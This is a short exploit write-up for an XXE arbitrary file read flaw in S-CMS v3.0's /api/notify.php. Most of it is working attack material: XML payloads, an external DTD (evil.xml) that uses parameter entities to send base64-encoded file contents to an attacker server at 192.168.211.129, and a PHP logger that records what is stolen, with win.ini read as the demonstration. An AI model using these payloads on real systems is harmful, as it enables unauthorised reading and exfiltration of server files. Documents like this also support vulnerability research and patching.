S-CMS v3.0 XXE Arbitrary File Read Vulnerability
Vulnerability environment: php5.3/5.4
The vulnerability is located in /api/notify.php, the key code is as follows:
The simplexml_load_string function directly interprets the xml passed in POST, and does not prohibit loading entities.
Note:
simplexml_load_string is the default parsing entity in the old version. In the new version, the entity is no longer parsed by default. You need to specify the third parameter LIBXML_NOENT, such as
simplexml_load_string($xml,'SimpleXMLElement',LIBXML_NOENT)
XXE entity detection
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY test "this is test">
]>
<root>&test;</root>See if external entities are supported
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://192.168.211.129:7777">
]>
<r>&sp;</r>Create a new evil.xml to be loaded remotely under the attacker server.
<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://192.168.211.129/xxe.php?file=%file;'>"> %payload;Xxe.php is used to record the contents of the read file
<?php
file_put_contents("1.log", $_GET['file']."\n",FILE_APPEND) ;
?>Blind XXE arbitrary file reading
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://192.168.211.129/evil.xml">
%dtd;
%send;
]>
<root></root>Send the request, the attacker server will generate a 1.log file, and successfully read the file.


